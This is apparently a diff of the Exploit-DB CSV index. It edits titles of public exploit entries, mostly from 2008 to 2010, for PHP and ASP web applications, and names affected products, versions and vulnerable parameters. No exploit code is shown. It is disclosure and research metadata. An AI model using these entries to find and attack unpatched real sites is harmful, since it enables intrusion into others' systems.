-6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - (targetid) SQL Injection",2008-10-31,"Hussin X",php,webapps,0 -6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO - 'track.php id' SQL Injection",2008-10-31,"Hussin X",php,webapps,0 -6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate - 'cat_id' SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - (Authentication Bypass) SQL Injection",2008-10-31,Hakxer,php,webapps,0 -6913,platforms/php/webapps/6913.txt,"SFS EZ Webring - (cat) SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not - (phid) SQL Injection",2008-10-31,d3b4g,php,webapps,0 -6915,platforms/php/webapps/6915.txt,"SFS EZ Software - 'id' SQL Injection",2008-10-31,x0r,php,webapps,0 +6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6909,platforms/php/webapps/6909.txt,"Adult Banner Exchange Website - 'targetid' Parameter SQL Injection",2008-10-31,"Hussin X",php,webapps,0 +6910,platforms/php/webapps/6910.txt,"SFS EZ BIZ PRO - SQL Injection",2008-10-31,"Hussin X",php,webapps,0 +6911,platforms/php/webapps/6911.txt,"SFS EZ Affiliate - 'cat_id' Parameter SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6912,platforms/php/webapps/6912.txt,"Article Publisher PRO 1.5 - Authentication Bypass",2008-10-31,Hakxer,php,webapps,0 +6913,platforms/php/webapps/6913.txt,"SFS EZ Webring - 'cat' Parameter SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6914,platforms/php/webapps/6914.txt,"SFS EZ Hot or Not - 'phid' Parameter SQL Injection",2008-10-31,d3b4g,php,webapps,0 +6915,platforms/php/webapps/6915.txt,"SFS EZ Software - 'id' Parameter SQL Injection",2008-10-31,x0r,php,webapps,0 6916,platforms/php/webapps/6916.txt,"ModernBill 4.4.x - Cross-Site Scripting / Remote File Inclusion",2008-10-31,nigh7f411,php,webapps,0 -6917,platforms/php/webapps/6917.php,"Article Publisher PRO - (userid) SQL Injection",2008-10-31,Stack,php,webapps,0 -6918,platforms/php/webapps/6918.txt,"SFS EZ Auction - 'viewfaqs.php cat' Blind SQL Injection",2008-10-31,Stack,php,webapps,0 -6919,platforms/php/webapps/6919.txt,"SFS EZ Career - 'content.php topic' SQL Injection",2008-10-31,Stack,php,webapps,0 -6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites - 'topsite.php ts' SQL Injection",2008-10-31,Stack,php,webapps,0 -6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore - (where) SQL Injection",2008-11-01,ZoRLu,php,webapps,0 -6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - 'Directory.php cat' SQL Injection",2008-11-01,Hakxer,php,webapps,0 -6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - 'id' SQL Injection",2008-11-01,ZoRLu,php,webapps,0 +6917,platforms/php/webapps/6917.php,"Article Publisher PRO - 'userid' Parameter SQL Injection",2008-10-31,Stack,php,webapps,0 +6918,platforms/php/webapps/6918.txt,"SFS EZ Auction - Blind SQL Injection",2008-10-31,Stack,php,webapps,0 +6919,platforms/php/webapps/6919.txt,"SFS EZ Career - SQL Injection",2008-10-31,Stack,php,webapps,0 +6920,platforms/php/webapps/6920.txt,"SFS EZ Top Sites - SQL Injection",2008-10-31,Stack,php,webapps,0 +6922,platforms/php/webapps/6922.txt,"SFS EZ Webstore - 'where' Parameter SQL Injection",2008-11-01,ZoRLu,php,webapps,0 +6923,platforms/php/webapps/6923.txt,"SFS EZ Pub Site - SQL Injection",2008-11-01,Hakxer,php,webapps,0 +6924,platforms/php/webapps/6924.txt,"SFS EZ Gaming Cheats - SQL Injection",2008-11-01,ZoRLu,php,webapps,0 6925,platforms/php/webapps/6925.txt,"Bloggie Lite 0.0.2 Beta - SQL Injection by Insecure Cookie Handling",2008-11-01,JosS,php,webapps,0 6928,platforms/php/webapps/6928.txt,"Joomla! Component Flash Tree Gallery 1.0 - Remote File Inclusion",2008-11-01,NoGe,php,webapps,0 6929,platforms/php/webapps/6929.txt,"Graugon PHP Article Publisher Pro 1.5 - Insecure Cookie Handling",2008-11-01,ZoRLu,php,webapps,0 -6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 -6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - 'details.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6930,platforms/php/webapps/6930.txt,"GO4I.NET ASP Forum 1.0 - SQL Injection",2008-11-01,Bl@ckbe@rD,php,webapps,0 +6931,platforms/php/webapps/6931.txt,"YourFreeWorld Programs Rating - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6932,platforms/php/webapps/6932.txt,"AJ Article 1.0 - Authentication Bypass",2008-11-01,Hakxer,php,webapps,0 6933,platforms/php/webapps/6933.pl,"Micro CMS 0.3.5 - Remote Add/Delete/Password Change Exploit",2008-11-01,StAkeR,php,webapps,0 -6934,platforms/php/webapps/6934.txt,"Shahrood - 'ndetail.php id' Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0 -6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6936,platforms/php/webapps/6936.txt,"YourFreeWorld Banner Management - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6937,platforms/php/webapps/6937.txt,"YourFreeWorld Blog Blaster - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6938,platforms/php/webapps/6938.txt,"YourFreeWorld Autoresponder Hosting - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6939,platforms/php/webapps/6939.txt,"YourFreeWorld Forced Matrix Script - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6940,platforms/php/webapps/6940.txt,"YourFreeWorld Short Url & Url Tracker - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6941,platforms/php/webapps/6941.txt,"YourFreeWorld Viral Marketing - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6942,platforms/php/webapps/6942.txt,"YourFreeWorld Scrolling Text Ads - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6943,platforms/php/webapps/6943.txt,"YourFreeWorld Reminder Service - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6944,platforms/php/webapps/6944.txt,"YourFreeWorld Classifieds Blaster - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6934,platforms/php/webapps/6934.txt,"Shahrood - Blind SQL Injection",2008-11-01,BazOka-HaCkEr,php,webapps,0 +6935,platforms/php/webapps/6935.txt,"YourFreeWorld Downline Builder - 'tr.php' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6936,platforms/php/webapps/6936.txt,"YourFreeWorld Banner Management - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6937,platforms/php/webapps/6937.txt,"YourFreeWorld Blog Blaster - 'tr.php' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6938,platforms/php/webapps/6938.txt,"YourFreeWorld Autoresponder Hosting - 'tr.php' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6939,platforms/php/webapps/6939.txt,"YourFreeWorld Forced Matrix Script - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6940,platforms/php/webapps/6940.txt,"YourFreeWorld Short Url & Url Tracker - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6941,platforms/php/webapps/6941.txt,"YourFreeWorld Viral Marketing - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6942,platforms/php/webapps/6942.txt,"YourFreeWorld Scrolling Text Ads - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6943,platforms/php/webapps/6943.txt,"YourFreeWorld Reminder Service - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6944,platforms/php/webapps/6944.txt,"YourFreeWorld Classifieds Blaster - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 6945,platforms/php/webapps/6945.txt,"YourFreeWorld Classifieds - 'category' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6946,platforms/php/webapps/6946.txt,"Downline Goldmine Builder - 'tr.php id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6947,platforms/php/webapps/6947.txt,"Downline Goldmine Category Addon - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6948,platforms/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6949,platforms/php/webapps/6949.txt,"YourFreeWorld URL Rotator - 'id' SQL Injection",2008-11-01,"Hussin X",php,webapps,0 -6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion - 'tr.php id' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 -6951,platforms/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder - 'tr.php id' SQL Injection",2008-11-02,"Hussin X",php,webapps,0 -6952,platforms/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - 'index.php c' Blind SQL Injection",2008-11-02,"Hussin X",php,webapps,0 -6953,platforms/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php cat' SQL Injection",2008-11-02,JosS,php,webapps,0 +6946,platforms/php/webapps/6946.txt,"Downline Goldmine Builder - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6947,platforms/php/webapps/6947.txt,"Downline Goldmine Category Addon - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6948,platforms/php/webapps/6948.txt,"YourFreeWorld Classifieds Hosting - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6949,platforms/php/webapps/6949.txt,"YourFreeWorld URL Rotator - SQL Injection",2008-11-01,"Hussin X",php,webapps,0 +6950,platforms/php/webapps/6950.txt,"Downline Goldmine paidversion - SQL Injection",2008-11-02,"Hussin X",php,webapps,0 +6951,platforms/php/webapps/6951.txt,"Downline Goldmine newdownlinebuilder - SQL Injection",2008-11-02,"Hussin X",php,webapps,0 +6952,platforms/php/webapps/6952.txt,"YourFreeWorld Shopping Cart - Blind SQL Injection",2008-11-02,"Hussin X",php,webapps,0 +6953,platforms/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php' SQL Injection",2008-11-02,JosS,php,webapps,0 6954,platforms/php/webapps/6954.txt,"Maran PHP Shop - 'admin.php' Insecure Cookie Handling",2008-11-02,JosS,php,webapps,0 6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps,0 6956,platforms/php/webapps/6956.txt,"Apartment Search Script - Arbitrary File Upload / Cross-Site Scripting",2008-11-02,ZoRLu,php,webapps,0 6957,platforms/php/webapps/6957.txt,"NetRisk 2.0 - Cross-Site Scripting / SQL Injection",2008-11-02,StAkeR,php,webapps,0 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop - 'prodshow.php' SQL Injection",2008-11-02,d3v1l,php,webapps,0 -6960,platforms/php/webapps/6960.txt,"1st News - 'products.php id' SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0 +6960,platforms/php/webapps/6960.txt,"1st News - SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0 6961,platforms/php/webapps/6961.pl,"DZCP (deV!L_z Clanportal) 1.4.9.6 - Blind SQL Injection",2008-11-02,anonymous,php,webapps,0 -6962,platforms/php/webapps/6962.txt,"BosClassifieds - 'cat_id' SQL Injection",2008-11-03,ZoRLu,php,webapps,0 +6962,platforms/php/webapps/6962.txt,"BosClassifieds - 'cat_id' Parameter SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6964,platforms/php/webapps/6964.txt,"Acc Real Estate 4.0 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6965,platforms/php/webapps/6965.txt,"Acc Statistics 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 6966,platforms/php/webapps/6966.txt,"Acc PHP eMail 1.1 - Insecure Cookie Handling",2008-11-03,Hakxer,php,webapps,0 -6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b - (view.php id) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 +6967,platforms/php/webapps/6967.txt,"MatPo Link 1.2b - SQL Injection",2008-11-03,ZoRLu,php,webapps,0 6968,platforms/php/webapps/6968.txt,"Acc Autos 4.0 - Insecure Cookie Handling",2008-11-03,x0r,php,webapps,0 -6969,platforms/php/webapps/6969.txt,"Apoll 0.7b - (Authentication Bypass) SQL Injection",2008-11-03,ZoRLu,php,webapps,0 +6969,platforms/php/webapps/6969.txt,"Apoll 0.7b - Authentication Bypass",2008-11-03,ZoRLu,php,webapps,0 6971,platforms/php/webapps/6971.txt,"MatPo Link 1.2b - Blind SQL Injection / Cross-Site Scripting",2008-11-03,Hakxer,php,webapps,0 -6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - (randompic.php) File Disclosure",2008-11-03,JosS,php,webapps,0 -6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - (index.php content) Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 +6972,platforms/php/webapps/6972.txt,"pppBlog 0.3.11 - File Disclosure",2008-11-03,JosS,php,webapps,0 +6973,platforms/php/webapps/6973.txt,"TBmnetCMS 1.0 - Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 6974,platforms/php/webapps/6974.txt,"WEBBDOMAIN WebShop 1.02 - SQL Injection / Cross-Site Scripting",2008-11-04,G4N0K,php,webapps,0 6975,platforms/php/webapps/6975.txt,"Joomla! Component VirtueMart Google Base 1.1 - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 6976,platforms/php/webapps/6976.txt,"Joomla! Component ongumatimesheet20 4b - Remote File Inclusion",2008-11-04,NoGe,php,webapps,0 -6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection",2008-11-04,"Hussin X",php,webapps,0 +6977,platforms/php/webapps/6977.txt,"WEBBDOMAIN Post Card 1.02 - 'catid' Parameter SQL Injection",2008-11-04,"Hussin X",php,webapps,0 6978,platforms/php/webapps/6978.txt,"Vibro-CMS - Multiple SQL Injections",2008-11-04,StAkeR,php,webapps,0 -6979,platforms/php/webapps/6979.txt,"nicLOR Puglia Landscape - 'id' Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 +6979,platforms/php/webapps/6979.txt,"nicLOR Puglia Landscape - Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 6980,platforms/php/webapps/6980.txt,"Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion",2008-11-04,d3v1l,php,webapps,0 -6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS - (nID) SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 +6981,platforms/php/webapps/6981.txt,"Vibro-School-CMS - 'nID' Parameter SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 6982,platforms/php/webapps/6982.txt,"CMS-School 2005 - 'showarticle.php' SQL Injection",2008-11-04,Cyber-Zone,php,webapps,0 -6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 -6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 -6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz 1.02 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 -6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop 1.02 - (Authentication Bypass) SQL Injection",2008-11-04,Hakxer,php,webapps,0 -6987,platforms/php/webapps/6987.txt,"Simple Document Management System 1.1.4 - SQL Injection Authentication Bypass",2008-11-04,Yuri,php,webapps,0 -6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - (cityview.php cityid) SQL Injection",2008-11-04,G4N0K,php,webapps,0 -6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - (Authentication Bypass) SQL Injection",2008-11-04,x0r,php,webapps,0 +6983,platforms/php/webapps/6983.txt,"WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 +6984,platforms/php/webapps/6984.txt,"WEBBDOMAIN Polls 1.01 - Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 +6985,platforms/php/webapps/6985.txt,"WEBBDOMAIN Quiz 1.02 - Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 +6986,platforms/php/webapps/6986.txt,"WEBBDOMAIN Webshop 1.02 - Authentication Bypass",2008-11-04,Hakxer,php,webapps,0 +6987,platforms/php/webapps/6987.txt,"Simple Document Management System 1.1.4 - Authentication Bypass",2008-11-04,Yuri,php,webapps,0 +6988,platforms/php/webapps/6988.txt,"Tours Manager 1.0 - SQL Injection",2008-11-04,G4N0K,php,webapps,0 +6989,platforms/php/webapps/6989.txt,"WEBBDOMAIN Post Card 1.02 - Authentication Bypass",2008-11-04,x0r,php,webapps,0 6990,platforms/php/webapps/6990.txt,"nicLOR Sito - includefile Local File Inclusion",2008-11-04,StAkeR,php,webapps,0 6991,platforms/php/webapps/6991.txt,"TR News 2.1 - 'login.php' Remote Login Bypass",2008-11-04,StAkeR,php,webapps,0 6992,platforms/php/webapps/6992.txt,"wotw 5.0 - Local / Remote File Inclusion",2008-11-04,dun,php,webapps,0 6993,platforms/php/webapps/6993.php,"Simple Machines Forum (SMF) 1.1.6 - Code Execution",2008-11-04,"Charles Fol",php,webapps,0 6995,platforms/php/webapps/6995.txt,"phpBB Mod Small ShoutBox 1.4 - Remote Edit/Delete Messages",2008-11-05,StAkeR,php,webapps,0 -6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - (news_id) SQL Injection",2008-11-05,StAkeR,php,webapps,0 -6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal - 'Tour.php id' SQL Injection",2008-11-05,G4N0K,php,webapps,0 +6996,platforms/php/webapps/6996.php,"PHPX 3.5.16 - 'news_id' Parameter SQL Injection",2008-11-05,StAkeR,php,webapps,0 +6997,platforms/php/webapps/6997.txt,"Pre Podcast Portal - SQL Injection",2008-11-05,G4N0K,php,webapps,0 6998,platforms/php/webapps/6998.txt,"Pre Shopping Mall - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 6999,platforms/php/webapps/6999.txt,"pre Multiple Vendors shopping malls - Multiple Vulnerabilities",2008-11-05,G4N0K,php,webapps,0 7000,platforms/php/webapps/7000.txt,"Pre Classified Listings - Insecure Cookie Handling",2008-11-05,G4N0K,php,webapps,0 @@ -20710,7 +20710,7 @@ id,file,description,date,author,platform,type,port 8130,platforms/asp/webapps/8130.txt,"Document Library 1.0.1 - Arbitrary Change Admin",2009-03-02,ByALBAYX,asp,webapps,0 8131,platforms/asp/webapps/8131.txt,"Digital Interchange Calendar 5.7.13 - Contents Change",2009-03-02,ByALBAYX,asp,webapps,0 8132,platforms/asp/webapps/8132.txt,"Access2asp - imageLibrary - (ASP) Arbitrary File Upload",2009-03-02,mr.al7rbi,asp,webapps,0 -8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities",2009-03-02,x0r,php,webapps,0 +8133,platforms/php/webapps/8133.txt,"Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling",2009-03-02,x0r,php,webapps,0 8134,platforms/php/webapps/8134.php,"Joomla! Component com_digistore - 'pid' Blind SQL Injection",2009-03-02,InjEctOr5,php,webapps,0 8136,platforms/php/webapps/8136.txt,"Joomla! / Mambo Component eXtplorer - Code Execution",2009-03-02,"Juan Galiana Lara",php,webapps,0 8139,platforms/php/webapps/8139.txt,"ritsblog 0.4.2 - Authentication Bypass / Cross-Site Scripting",2009-03-02,"Salvatore Fresta",php,webapps,0 @@ -20825,7 +20825,7 @@ id,file,description,date,author,platform,type,port 8382,platforms/php/webapps/8382.txt,"WebFileExplorer 3.1 - (Authentication Bypass) SQL Injection",2009-04-09,Osirys,php,webapps,0 8383,platforms/php/webapps/8383.txt,"adaptbb 1.0b - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8385,platforms/php/webapps/8385.txt,"My Dealer CMS 2.0 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 -8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - (Authentication Bypass) SQL Injection",2009-04-09,"ThE g0bL!N",php,webapps,0 +8386,platforms/php/webapps/8386.txt,"Absolute Form Processor XE-V 1.5 - Authentication Bypass",2009-04-09,"ThE g0bL!N",php,webapps,0 8387,platforms/php/webapps/8387.txt,"dynamic flash forum 1.0 Beta - Multiple Vulnerabilities",2009-04-09,"Salvatore Fresta",php,webapps,0 8388,platforms/php/webapps/8388.txt,"PHP-Agenda 2.2.5 - Remote File Overwriting",2009-04-10,"Salvatore Fresta",php,webapps,0 8389,platforms/php/webapps/8389.txt,"Loggix Project 9.4.5 - (refer_id) Blind SQL Injection",2009-04-10,"Salvatore Fresta",php,webapps,0 @@ -21065,7 +21065,7 @@ id,file,description,date,author,platform,type,port 8797,platforms/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0 8801,platforms/php/webapps/8801.txt,"Joomla! Component com_rsgallery2 1.14.x/2.x - Remote Backdoor",2009-05-26,"Jan Van Niekerk",php,webapps,0 8802,platforms/php/webapps/8802.txt,"Kensei Board 2.0.0b - Multiple SQL Injections",2009-05-26,cOndemned,php,webapps,0 -8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - (Authentication Bypass) SQL Injection",2009-05-26,"ThE g0bL!N",php,webapps,0 +8803,platforms/php/webapps/8803.txt,"MyForum 1.3 - Authentication Bypass",2009-05-26,"ThE g0bL!N",php,webapps,0 8805,platforms/php/webapps/8805.txt,"Flash Image Gallery 1.1 - Arbitrary Config File Disclosure",2009-05-26,DarkbiteX,php,webapps,0 8807,platforms/php/webapps/8807.htm,"ShaadiClone 2.0 - (addAdminmembercode.php) Add Admin",2009-05-26,x.CJP.x,php,webapps,0 8808,platforms/php/webapps/8808.txt,"phpBugTracker 1.0.3 - (Authentication Bypass) SQL Injection",2009-05-26,ByALBAYX,php,webapps,0 @@ -23613,7 +23613,7 @@ id,file,description,date,author,platform,type,port 14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps,0 14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0 14187,platforms/php/webapps/14187.txt,"Joomla! Component eventCal 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0 -14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0 +14188,platforms/php/webapps/14188.html,"cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0 14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0 14196,platforms/php/webapps/14196.txt,"Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,php,webapps,0 @@ -23659,7 +23659,7 @@ id,file,description,date,author,platform,type,port 14255,platforms/php/webapps/14255.txt,"sandbox 2.0.3 - Multiple Vulnerabilities",2010-07-06,"Salvatore Fresta",php,webapps,0 14259,platforms/php/webapps/14259.txt,"Green Shop - SQL Injection",2010-07-07,PrinceofHacking,php,webapps,0 14260,platforms/php/webapps/14260.txt,"Sijio Community Software - SQL Injection / Persistent Cross-Site Scripting",2010-07-07,Sid3^effects,php,webapps,0 -14262,platforms/php/webapps/14262.txt,"Simple Document Management System (SDMS) - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 +14262,platforms/php/webapps/14262.txt,"Simple Document Management System - SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station - Running Config Cross-Site Request Forgery",2010-07-07,kalyanakumar,hardware,webapps,0 14263,platforms/php/webapps/14263.txt,"Joomla! Component ArtForms 2.1b7.2 rc2 - Multiple Vulnerabilities",2010-07-07,"Salvatore Fresta",php,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla! Component 'PaymentsPlus' 2.1.5 - Blind SQL Injection",2010-07-07,Sid3^effects,php,webapps,0 @@ -24038,7 +24038,7 @@ id,file,description,date,author,platform,type,port 15269,platforms/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,php,webapps,0 15227,platforms/php/webapps/15227.txt,"PHP-Fusion Mod Mg User Fotoalbum 1.0.1 - SQL Injection",2010-10-10,"Easy Laster",php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics CMS - Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0 +15593,platforms/php/webapps/15593.html,"cPanel 11.x - Cross-Site Request Forgery (Edit E-mail)",2010-11-21,"Mon7rF .",php,webapps,0 15594,platforms/php/webapps/15594.txt,"AuraCMS 1.62 - 'pfd.php' SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced - Blind SQL Injection",2010-11-22,"Don Tukulesto",php,webapps,0 15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 - File Download Exploit",2010-11-22,Beach,jsp,webapps,0 @@ -29141,7 +29141,7 @@ id,file,description,date,author,platform,type,port 27582,platforms/php/webapps/27582.txt,"AWeb's Banner Generator 3.0 - Cross-Site Scripting",2006-04-07,benozor77,php,webapps,0 27583,platforms/cgi/webapps/27583.txt,"TalentSoft Web+ Shop 5.0 - Deptname Parameter Cross-Site Scripting",2006-04-07,r0t,cgi,webapps,0 27584,platforms/php/webapps/27584.txt,"JBook 1.3 - 'index.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 -27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'index.php' page Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 +27585,platforms/php/webapps/27585.txt,"PHPMyForum 4.0 - 'page' Parameter Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27586,platforms/php/webapps/27586.txt,"PHPMyForum 4.0 - 'index.php' type Variable CRLF Injection",2006-04-10,Psych0,php,webapps,0 27587,platforms/php/webapps/27587.txt,"PHPWebGallery 1.4.1 - 'category.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 27588,platforms/php/webapps/27588.txt,"PHPWebGallery 1.4.1 - 'picture.php' Cross-Site Scripting",2006-04-10,Psych0,php,webapps,0 @@ -29509,7 +29509,7 @@ id,file,description,date,author,platform,type,port 28104,platforms/php/webapps/28104.txt,"ADODB 4.6/4.7 - 'Tmssql.php' Cross-Site Scripting",2006-06-26,"Rodrigo Silva",php,webapps,0 28105,platforms/php/webapps/28105.txt,"eNpaper1 - Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0 -28107,platforms/php/webapps/28107.txt,"Cpanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 +28107,platforms/php/webapps/28107.txt,"cPanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 28108,platforms/php/webapps/28108.txt,"MyMail 1.0 - 'login.php' Cross-Site Scripting",2006-06-26,botan,php,webapps,0 28109,platforms/php/webapps/28109.txt,"Usenet 0.5 - 'index.php' Cross-Site Scripting",2006-06-23,Luny,php,webapps,0 28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting",2006-06-26,r0t,php,webapps,0 @@ -29810,7 +29810,7 @@ id,file,description,date,author,platform,type,port 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",linux,webapps,0 28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b - 'index.php' Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps,0 28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 - 'login.php' Cross-Site Scripting",2006-09-24,meto5757,palm_os,webapps,0 -28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0 +28660,platforms/php/webapps/28660.php,"cPanel 5-10 - SUID Wrapper Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0 